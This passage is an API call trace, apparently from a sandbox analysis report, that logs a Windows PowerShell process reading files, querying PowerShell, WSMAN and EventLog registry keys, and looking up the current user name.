	[0817.367] ReadFile (in: hFile=0x304, lpBuffer=0x2f2b908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x2f2b908*, lpNumberOfBytesRead=0x24d238*=0x1000, lpOverlapped=0x0) returned 1
	[0817.368] ReadFile (in: hFile=0x304, lpBuffer=0x2f2b908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x2f2b908*, lpNumberOfBytesRead=0x24d238*=0xe98, lpOverlapped=0x0) returned 1
	[0817.368] ReadFile (in: hFile=0x304, lpBuffer=0x2f2af08, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x2f2af08*, lpNumberOfBytesRead=0x24d238*=0x0, lpOverlapped=0x0) returned 1
	[0817.368] ReadFile (in: hFile=0x304, lpBuffer=0x2f2b908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d238, lpOverlapped=0x0 | out: lpBuffer=0x2f2b908*, lpNumberOfBytesRead=0x24d238*=0x0, lpOverlapped=0x0) returned 1
	[0817.368] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d2c8 | out: phkResult=0x24d2c8*=0x304) returned 0x0
	[0817.368] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d24c, lpData=0x0, lpcbData=0x24d248*=0x0 | out: lpType=0x24d24c*=0x1, lpData=0x0, lpcbData=0x24d248*=0x56) returned 0x0
	[0817.368] CoTaskMemAlloc (cb=0x5a) returned 0x1b7f8c30
	[0817.368] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d21c, lpData=0x1b7f8c30, lpcbData=0x24d218*=0x56 | out: lpType=0x24d21c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d218*=0x56) returned 0x0
	[0817.368] CoTaskMemFree (pv=0x1b7f8c30) 
	[0817.368] RegCloseKey (hKey=0x304) returned 0x0
	[0817.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0817.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0817.369] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0xb2f159b2, Data2=0x5cc8, Data3=0x4b76, Data4=([0]=0x83, [1]=0xd2, [2]=0x5e, [3]=0xdb, [4]=0xee, [5]=0x65, [6]=0x72, [7]=0x6))) returned 0x0
	[0817.369] CoCreateGuid (in: pguid=0x24d4f0 | out: pguid=0x24d4f0*(Data1=0x871f43eb, Data2=0x16d, Data3=0x4dd6, Data4=([0]=0xa6, [1]=0xe2, [2]=0xee, [3]=0xc3, [4]=0x5f, [5]=0x9b, [6]=0xf5, [7]=0xe8))) returned 0x0
	[0817.386] CoTaskMemAlloc (cb=0x104) returned 0x1817b0
	[0817.386] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1817b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0817.386] CoTaskMemFree (pv=0x1817b0) 
	[0817.387] CoTaskMemAlloc (cb=0x104) returned 0x1817b0
	[0817.387] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1817b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0817.387] CoTaskMemFree (pv=0x1817b0) 
	[0817.387] CoTaskMemAlloc (cb=0x104) returned 0x1817b0
	[0817.387] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1817b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0817.387] CoTaskMemFree (pv=0x1817b0) 
	[0817.388] CoTaskMemAlloc (cb=0x104) returned 0x1817b0
	[0817.388] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1817b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0817.388] CoTaskMemFree (pv=0x1817b0) 
	[0817.390] CoTaskMemAlloc (cb=0x104) returned 0x1817b0
	[0817.390] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1817b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0817.391] CoTaskMemFree (pv=0x1817b0) 
	[0817.391] CoTaskMemAlloc (cb=0x104) returned 0x1817b0
	[0817.391] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1817b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0817.391] CoTaskMemFree (pv=0x1817b0) 
	[0817.392] CoTaskMemAlloc (cb=0x104) returned 0x1817b0
	[0817.392] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1817b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0817.392] CoTaskMemFree (pv=0x1817b0) 
	[0818.603] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d4d8 | out: phkResult=0x24d4d8*=0x304) returned 0x0
	[0818.607] RegQueryInfoKeyW (in: hKey=0x304, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24d3dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d3d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24d3dc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d3d8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0818.607] CoTaskMemFree (pv=0x0) 
	[0818.608] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0818.608] RegEnumValueW (in: hKey=0x304, dwIndex=0x0, lpValueName=0x129840, lpcchValueName=0x24d488, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x24d488, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0818.608] CoTaskMemFree (pv=0x129840) 
	[0818.608] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0818.608] RegEnumValueW (in: hKey=0x304, dwIndex=0x1, lpValueName=0x129840, lpcchValueName=0x24d488, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x24d488, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0818.608] CoTaskMemFree (pv=0x129840) 
	[0818.608] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0818.608] RegEnumValueW (in: hKey=0x304, dwIndex=0x2, lpValueName=0x129840, lpcchValueName=0x24d488, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x24d488, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0818.608] CoTaskMemFree (pv=0x129840) 
	[0818.610] RegQueryValueExW (in: hKey=0x304, lpValueName="StackVersion", lpReserved=0x0, lpType=0x24d46c, lpData=0x0, lpcbData=0x24d468*=0x0 | out: lpType=0x24d46c*=0x1, lpData=0x0, lpcbData=0x24d468*=0x8) returned 0x0
	[0818.610] CoTaskMemAlloc (cb=0xc) returned 0x1922c0
	[0818.610] RegQueryValueExW (in: hKey=0x304, lpValueName="StackVersion", lpReserved=0x0, lpType=0x24d43c, lpData=0x1922c0, lpcbData=0x24d438*=0x8 | out: lpType=0x24d43c*=0x1, lpData="2.0", lpcbData=0x24d438*=0x8) returned 0x0
	[0818.610] CoTaskMemFree (pv=0x1922c0) 
	[0833.425] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d428 | out: phkResult=0x24d428*=0x194) returned 0x0
	[0833.426] RegQueryInfoKeyW (in: hKey=0x194, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24d32c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d328, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24d32c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d328*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0833.426] CoTaskMemFree (pv=0x0) 
	[0833.426] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0833.426] RegEnumValueW (in: hKey=0x194, dwIndex=0x0, lpValueName=0x129840, lpcchValueName=0x24d3d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x24d3d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0833.426] CoTaskMemFree (pv=0x129840) 
	[0833.426] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0833.426] RegEnumValueW (in: hKey=0x194, dwIndex=0x1, lpValueName=0x129840, lpcchValueName=0x24d3d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x24d3d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0833.426] CoTaskMemFree (pv=0x129840) 
	[0833.426] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0833.426] RegEnumValueW (in: hKey=0x194, dwIndex=0x2, lpValueName=0x129840, lpcchValueName=0x24d3d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x24d3d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0833.426] CoTaskMemFree (pv=0x129840) 
	[0833.426] RegQueryValueExW (in: hKey=0x194, lpValueName="StackVersion", lpReserved=0x0, lpType=0x24d3bc, lpData=0x0, lpcbData=0x24d3b8*=0x0 | out: lpType=0x24d3bc*=0x1, lpData=0x0, lpcbData=0x24d3b8*=0x8) returned 0x0
	[0833.426] CoTaskMemAlloc (cb=0xc) returned 0x1922a0
	[0833.427] RegQueryValueExW (in: hKey=0x194, lpValueName="StackVersion", lpReserved=0x0, lpType=0x24d38c, lpData=0x1922a0, lpcbData=0x24d388*=0x8 | out: lpType=0x24d38c*=0x1, lpData="2.0", lpcbData=0x24d388*=0x8) returned 0x0
	[0833.428] CoTaskMemFree (pv=0x1922a0) 
	[0833.429] CoTaskMemAlloc (cb=0x104) returned 0x1817b0
	[0833.429] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1817b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0833.429] CoTaskMemFree (pv=0x1817b0) 
	[0833.434] CoTaskMemAlloc (cb=0x104) returned 0x1817b0
	[0833.434] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1817b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0833.434] CoTaskMemFree (pv=0x1817b0) 
	[0833.440] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d458 | out: phkResult=0x24d458*=0x30c) returned 0x0
	[0833.445] RegQueryInfoKeyW (in: hKey=0x30c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24d3cc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d3c8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24d3cc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d3c8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0833.445] CoTaskMemFree (pv=0x0) 
	[0833.446] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0833.446] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x0, lpName=0x129840, lpcchName=0x24d458, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x24d458, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0833.446] CoTaskMemFree (pv=0x129840) 
	[0833.446] CoTaskMemFree (pv=0x0) 
	[0833.446] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0833.446] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x1, lpName=0x129840, lpcchName=0x24d458, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x24d458, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0833.446] CoTaskMemFree (pv=0x129840) 
	[0833.446] CoTaskMemFree (pv=0x0) 
	[0833.446] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0833.446] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x2, lpName=0x129840, lpcchName=0x24d458, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x24d458, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0833.446] CoTaskMemFree (pv=0x129840) 
	[0833.446] CoTaskMemFree (pv=0x0) 
	[0833.446] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0833.446] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x3, lpName=0x129840, lpcchName=0x24d458, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x24d458, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0833.446] CoTaskMemFree (pv=0x129840) 
	[0833.447] CoTaskMemFree (pv=0x0) 
	[0833.447] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0833.447] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x4, lpName=0x129840, lpcchName=0x24d458, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x24d458, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0833.447] CoTaskMemFree (pv=0x129840) 
	[0833.447] CoTaskMemFree (pv=0x0) 
	[0833.447] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0833.447] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x5, lpName=0x129840, lpcchName=0x24d458, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x24d458, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0833.447] CoTaskMemFree (pv=0x129840) 
	[0833.447] CoTaskMemFree (pv=0x0) 
	[0833.447] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0833.447] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x6, lpName=0x129840, lpcchName=0x24d458, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x24d458, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0833.447] CoTaskMemFree (pv=0x129840) 
	[0833.447] CoTaskMemFree (pv=0x0) 
	[0833.447] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0833.447] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x7, lpName=0x129840, lpcchName=0x24d458, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x24d458, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0833.447] CoTaskMemFree (pv=0x129840) 
	[0833.447] CoTaskMemFree (pv=0x0) 
	[0833.447] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0833.448] RegEnumKeyExW (in: hKey=0x30c, dwIndex=0x8, lpName=0x129840, lpcchName=0x24d458, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x24d458, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0833.448] CoTaskMemFree (pv=0x129840) 
	[0833.448] CoTaskMemFree (pv=0x0) 
	[0833.448] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d4b8 | out: phkResult=0x24d4b8*=0x310) returned 0x0
	[0833.448] RegOpenKeyExW (in: hKey=0x310, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d4b8 | out: phkResult=0x24d4b8*=0x0) returned 0x2
	[0833.448] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d4b8 | out: phkResult=0x24d4b8*=0x318) returned 0x0
	[0833.448] RegOpenKeyExW (in: hKey=0x318, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d4b8 | out: phkResult=0x24d4b8*=0x0) returned 0x2
	[0833.448] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d4b8 | out: phkResult=0x24d4b8*=0x31c) returned 0x0
	[0833.448] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d4b8 | out: phkResult=0x24d4b8*=0x0) returned 0x2
	[0835.510] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d4b8 | out: phkResult=0x24d4b8*=0x320) returned 0x0
	[0835.510] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d4b8 | out: phkResult=0x24d4b8*=0x0) returned 0x2
	[0835.510] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d4b8 | out: phkResult=0x24d4b8*=0x324) returned 0x0
	[0835.510] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d4b8 | out: phkResult=0x24d4b8*=0x0) returned 0x2
	[0835.510] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d4b8 | out: phkResult=0x24d4b8*=0x328) returned 0x0
	[0835.510] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d4b8 | out: phkResult=0x24d4b8*=0x0) returned 0x2
	[0835.510] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d4b8 | out: phkResult=0x24d4b8*=0x32c) returned 0x0
	[0835.510] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d4b8 | out: phkResult=0x24d4b8*=0x0) returned 0x2
	[0835.511] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d4b8 | out: phkResult=0x24d4b8*=0x330) returned 0x0
	[0835.511] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d4b8 | out: phkResult=0x24d4b8*=0x0) returned 0x2
	[0835.511] RegOpenKeyExW (in: hKey=0x30c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d4b8 | out: phkResult=0x24d4b8*=0x334) returned 0x0
	[0835.511] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d4b8 | out: phkResult=0x24d4b8*=0x338) returned 0x0
	[0835.511] RegCloseKey (hKey=0x338) returned 0x0
	[0835.511] RegCloseKey (hKey=0x30c) returned 0x0
	[0835.512] RegCloseKey (hKey=0x334) returned 0x0
	[0835.529] CoTaskMemAlloc (cb=0x804) returned 0x1b807960
	[0835.529] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b807960, nSize=0x24d6c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d6c8) returned 0x1
	[0835.530] CoTaskMemFree (pv=0x1b807960) 
	[0835.532] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0835.532] GetUserNameW (in: lpBuffer=0x129840, pcbBuffer=0x24d708 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d708) returned 1
	[0835.532] CoTaskMemFree (pv=0x129840) 
	[0837.686] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d408 | out: phkResult=0x24d408*=0x33c) returned 0x0
	[0837.686] RegQueryInfoKeyW (in: hKey=0x33c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24d37c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d378, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24d37c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d378*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.686] CoTaskMemFree (pv=0x0) 
	[0837.686] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0837.686] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x0, lpName=0x129840, lpcchName=0x24d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x24d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.687] CoTaskMemFree (pv=0x129840) 
	[0837.687] CoTaskMemFree (pv=0x0) 
	[0837.687] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0837.687] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x1, lpName=0x129840, lpcchName=0x24d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x24d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.687] CoTaskMemFree (pv=0x129840) 
	[0837.687] CoTaskMemFree (pv=0x0) 
	[0837.687] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0837.687] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x2, lpName=0x129840, lpcchName=0x24d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x24d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.687] CoTaskMemFree (pv=0x129840) 
	[0837.687] CoTaskMemFree (pv=0x0) 
	[0837.687] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0837.687] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x3, lpName=0x129840, lpcchName=0x24d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x24d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.687] CoTaskMemFree (pv=0x129840) 
	[0837.687] CoTaskMemFree (pv=0x0) 
	[0837.687] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0837.688] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x4, lpName=0x129840, lpcchName=0x24d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x24d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.688] CoTaskMemFree (pv=0x129840) 
	[0837.688] CoTaskMemFree (pv=0x0) 
	[0837.688] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0837.688] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x5, lpName=0x129840, lpcchName=0x24d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x24d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.688] CoTaskMemFree (pv=0x129840) 
	[0837.688] CoTaskMemFree (pv=0x0) 
	[0837.688] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0837.688] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x6, lpName=0x129840, lpcchName=0x24d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x24d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.688] CoTaskMemFree (pv=0x129840) 
	[0837.688] CoTaskMemFree (pv=0x0) 
	[0837.688] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0837.688] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x7, lpName=0x129840, lpcchName=0x24d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x24d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.689] CoTaskMemFree (pv=0x129840) 
	[0837.689] CoTaskMemFree (pv=0x0) 
	[0837.689] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0837.689] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x8, lpName=0x129840, lpcchName=0x24d408, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x24d408, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0837.689] CoTaskMemFree (pv=0x129840) 
	[0837.689] CoTaskMemFree (pv=0x0) 
	[0837.689] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x340) returned 0x0
	[0837.689] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x0) returned 0x2
	[0837.689] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x344) returned 0x0
	[0837.689] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x0) returned 0x2
	[0837.689] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x348) returned 0x0
	[0837.690] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x0) returned 0x2
	[0837.690] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x34c) returned 0x0
	[0837.690] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x0) returned 0x2
	[0837.690] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d468 | out: phkResult=0x24d468*=0x350) returned 0x0
